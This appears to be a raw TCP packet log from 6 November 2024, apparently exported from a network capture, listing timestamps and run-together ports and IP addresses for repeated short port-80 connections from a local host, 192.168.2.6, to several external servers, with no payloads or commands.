                                                                                                        Nov 6, 2024 08:39:43.623802900 CET4991180192.168.2.6154.92.61.37
                                                                                                        Nov 6, 2024 08:39:43.625179052 CET4991180192.168.2.6154.92.61.37
                                                                                                        Nov 6, 2024 08:39:43.629956961 CET8049911154.92.61.37192.168.2.6
                                                                                                        Nov 6, 2024 08:39:58.774239063 CET4998380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:39:58.779206991 CET80499833.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:39:58.779367924 CET4998380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:39:58.887490034 CET4998380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:39:58.892349958 CET80499833.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:00.378061056 CET80499833.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:00.378127098 CET4998380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:00.400737047 CET4998380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:00.405683041 CET80499833.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:01.421528101 CET4998480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:01.426395893 CET80499843.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:01.426486969 CET4998480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:01.441909075 CET4998480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:01.446775913 CET80499843.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:02.083580017 CET80499843.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:02.083678007 CET4998480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:02.947467089 CET4998480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:02.952258110 CET80499843.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:03.966655016 CET4998580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:03.971580982 CET80499853.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:03.971709013 CET4998580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:03.983037949 CET4998580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:03.987971067 CET80499853.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:03.988174915 CET80499853.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:04.597369909 CET80499853.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:04.597512007 CET4998580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:05.494396925 CET4998580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:05.499288082 CET80499853.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:06.513761044 CET4998680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:06.523243904 CET80499863.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:06.523354053 CET4998680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:06.531075954 CET4998680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:06.537527084 CET80499863.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:07.141361952 CET80499863.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:07.141936064 CET80499863.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:07.142020941 CET4998680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:07.144632101 CET4998680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:07.150162935 CET80499863.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:12.284398079 CET4998780192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:12.289203882 CET8049987203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:12.289280891 CET4998780192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:12.301387072 CET4998780192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:12.306303024 CET8049987203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:12.982852936 CET8049987203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:13.021349907 CET8049987203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:13.021440029 CET4998780192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:13.807001114 CET4998780192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:14.826188087 CET4998880192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:14.831085920 CET8049988203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:14.831196070 CET4998880192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:14.842593908 CET4998880192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:14.847497940 CET8049988203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:15.511419058 CET8049988203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:15.547431946 CET8049988203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:15.547543049 CET4998880192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:16.353882074 CET4998880192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:17.372709990 CET4998980192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:17.377845049 CET8049989203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:17.377940893 CET4998980192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:17.389429092 CET4998980192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:17.394979000 CET8049989203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:17.396624088 CET8049989203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:18.071787119 CET8049989203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:18.109906912 CET8049989203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:18.109970093 CET4998980192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:18.900597095 CET4998980192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:19.919563055 CET4999080192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:19.924761057 CET8049990203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:19.924848080 CET4999080192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:19.932594061 CET4999080192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:19.937530994 CET8049990203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:20.633265972 CET8049990203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:20.671899080 CET8049990203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:20.672097921 CET4999080192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:20.673038006 CET4999080192.168.2.6203.161.49.193
                                                                                                        Nov 6, 2024 08:40:20.679121971 CET8049990203.161.49.193192.168.2.6
                                                                                                        Nov 6, 2024 08:40:25.734044075 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:25.742497921 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:25.742624998 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:25.759612083 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:25.764493942 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:26.374594927 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:26.374694109 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:27.275600910 CET4999180192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:27.280603886 CET80499913.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.294519901 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:28.299420118 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.299624920 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:28.310998917 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:28.315748930 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.933896065 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:28.933962107 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:29.824251890 CET4999380192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:29.885453939 CET80499933.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:30.841337919 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:31.148392916 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.148514032 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:31.159502029 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:31.164509058 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.164587975 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.782716990 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:31.782788992 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:32.718523979 CET4999480192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:32.723457098 CET80499943.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:33.731908083 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:33.736902952 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:33.737010002 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:33.744096994 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:33.748997927 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:34.354901075 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:34.357446909 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:34.357564926 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:34.358556032 CET4999580192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:34.363363028 CET80499953.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:39.397655964 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:39.404107094 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:39.404243946 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:39.417275906 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:39.422535896 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:40.033236980 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:40.033394098 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:40.935269117 CET4999680192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:40.940124035 CET80499963.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:41.962002039 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:41.967083931 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:41.967164993 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:41.980679035 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:41.985572100 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:42.594698906 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:42.594794035 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:43.494308949 CET4999780192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:43.499443054 CET80499973.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:44.533160925 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:44.538155079 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:44.538235903 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:44.573451996 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:44.578409910 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:44.578421116 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:45.156754971 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:45.156853914 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:46.088103056 CET4999880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:46.093050003 CET80499983.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.238002062 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.243207932 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.243325949 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.255166054 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.260216951 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.886740923 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.887249947 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:47.887322903 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.890433073 CET4999980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:40:47.895275116 CET80499993.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:40:52.971354961 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:52.976399899 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:52.983352900 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:53.007347107 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:53.012202978 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:53.640574932 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:53.673217058 CET8050000198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:53.673383951 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:54.510349989 CET5000080192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.594279051 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.599209070 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:55.601421118 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.615777969 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:55.620646000 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:56.266798019 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:56.299587011 CET8050001198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:56.299645901 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:57.137268066 CET5000180192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.161780119 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.166702032 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:58.166779041 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.184679985 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:58.189707994 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:58.189722061 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:40:59.697416067 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:40:59.742846966 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:00.717453003 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:00.723603010 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:00.723671913 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:00.734349966 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:00.739175081 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:01.380016088 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:01.412297010 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:01.413455009 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:01.416404009 CET5000380192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:01.421344042 CET8050003198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:06.642143011 CET8050002198.252.98.54192.168.2.6
                                                                                                        Nov 6, 2024 08:41:06.642206907 CET5000280192.168.2.6198.252.98.54
                                                                                                        Nov 6, 2024 08:41:06.745850086 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:06.750718117 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:06.750792980 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:06.764895916 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:06.769711018 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:07.425868988 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:07.456358910 CET8050005103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:07.459322929 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:08.276012897 CET5000580192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.295331955 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.300219059 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:09.303358078 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.315457106 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:09.320338011 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:09.973614931 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:10.004441023 CET8050006103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:10.004530907 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:10.823252916 CET5000680192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.844347954 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.849343061 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:11.849416018 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.865485907 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:11.870287895 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:11.870364904 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:12.519090891 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:12.549897909 CET8050007103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:12.550081015 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:13.371264935 CET5000780192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.389755011 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.394633055 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:14.394716024 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.405353069 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:14.410123110 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.086507082 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.086530924 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.086786985 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:15.117961884 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:15.118123055 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:15.121293068 CET5000880192.168.2.6103.224.182.242
                                                                                                        Nov 6, 2024 08:41:15.126024961 CET8050008103.224.182.242192.168.2.6
                                                                                                        Nov 6, 2024 08:41:20.760473967 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:20.765266895 CET8050009154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:20.765374899 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:20.776249886 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:20.781075954 CET8050009154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:21.718147039 CET8050009154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:21.763238907 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:21.892734051 CET8050009154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:21.892805099 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:22.291335106 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:23.310601950 CET5001080192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:23.315596104 CET8050010154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:23.315854073 CET5001080192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:23.326683998 CET5001080192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:23.331540108 CET8050010154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:24.278285027 CET8050010154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:24.322355986 CET5001080192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:24.460068941 CET8050010154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:24.460130930 CET5001080192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:24.839243889 CET5001080192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:25.857830048 CET5001180192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:25.862895966 CET8050011154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:25.862958908 CET5001180192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:25.877367020 CET5001180192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:25.882199049 CET8050011154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:25.882277966 CET8050011154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:26.817244053 CET8050011154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:26.871249914 CET5001180192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:26.998753071 CET8050011154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:26.999320030 CET5001180192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:27.386250973 CET5001180192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:28.419085979 CET5001280192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:28.424069881 CET8050012154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:28.424149990 CET5001280192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:28.450025082 CET5001280192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:28.454843044 CET8050012154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:29.382304907 CET8050012154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:29.435246944 CET5001280192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:29.563883066 CET8050012154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:29.564070940 CET5001280192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:29.564945936 CET5001280192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:29.569693089 CET8050012154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:34.687810898 CET5001380192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:34.692701101 CET805001331.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:34.692825079 CET5001380192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:34.704093933 CET5001380192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:34.708956957 CET805001331.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:35.580090046 CET805001331.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:35.712995052 CET5001380192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:35.731149912 CET805001331.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:35.731224060 CET5001380192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:36.213150024 CET5001380192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:37.232212067 CET5001480192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:37.237189054 CET805001431.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:37.237348080 CET5001480192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:37.249558926 CET5001480192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:37.254981041 CET805001431.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:38.165126085 CET805001431.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:38.228621960 CET5001480192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:38.316509962 CET805001431.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:38.316570044 CET5001480192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:38.760024071 CET5001480192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:39.805691004 CET5001580192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:39.810559034 CET805001531.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:39.810688019 CET5001580192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:39.824002981 CET5001580192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:39.828983068 CET805001531.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:39.829193115 CET805001531.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:40.729546070 CET805001531.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:40.806799889 CET5001580192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:40.894798040 CET805001531.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:40.901669979 CET5001580192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:41.338043928 CET5001580192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:42.438366890 CET5001680192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:42.443780899 CET805001631.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:42.443896055 CET5001680192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:42.600986958 CET5001680192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:42.605990887 CET805001631.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:43.401824951 CET805001631.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:43.525574923 CET5001680192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:43.554832935 CET805001631.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:43.555035114 CET5001680192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:43.558238029 CET5001680192.168.2.631.31.196.17
                                                                                                        Nov 6, 2024 08:41:43.563069105 CET805001631.31.196.17192.168.2.6
                                                                                                        Nov 6, 2024 08:41:48.766396046 CET5001780192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:48.771534920 CET805001713.248.169.48192.168.2.6
                                                                                                        Nov 6, 2024 08:41:48.771604061 CET5001780192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:48.785178900 CET5001780192.168.2.613.248.169.48
                                                                                                        Nov 6, 2024 08:41:48.790219069 CET805001713.248.169.48192.168.2.6
